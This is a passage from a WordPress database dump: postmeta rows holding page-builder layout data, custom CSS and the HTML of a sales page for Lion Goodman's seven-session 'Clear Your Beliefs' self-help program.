Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1650, 1340, 'rt_custom_css', '.entry-content > p {\r\n    margin-left: 40px;\r\n    margin-right: 40px;\r\n}'),
(1651, 1332, 'rt_custom_css', '.entry-content > h1 {\r\n    margin-left: 40px;\r\n    margin-right: 40px;\r\n}\r\n.entry-content > h5 {\r\n    margin-left: 40px;\r\n    margin-right: 40px;\r\n}\r\n.entry-content > p {\r\n    margin-left: 40px;\r\n    margin-right: 40px;\r\n}'),
(1652, 1332, 'panels_data', 'a:0:{}'),
(1653, 2071, 'rt_custom_css', '.entry-content > p {\r\n    margin-left: 40px;\r\n    margin-right: 40px;\r\n}'),
(1654, 2080, '_edit_lock', '1421042293:2'),
(1655, 2080, '_edit_last', '2'),
(1656, 2080, '_wp_page_template', 'default'),
(1657, 2080, 'rt_custom_css', ''),
(1658, 2080, 'panels_data', 'a:0:{}'),
(1663, 1941, 'rt_custom_css', '');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1670, 2084, 'panels_data', 'a:3:{s:7:"widgets";a:2:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:71182:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you 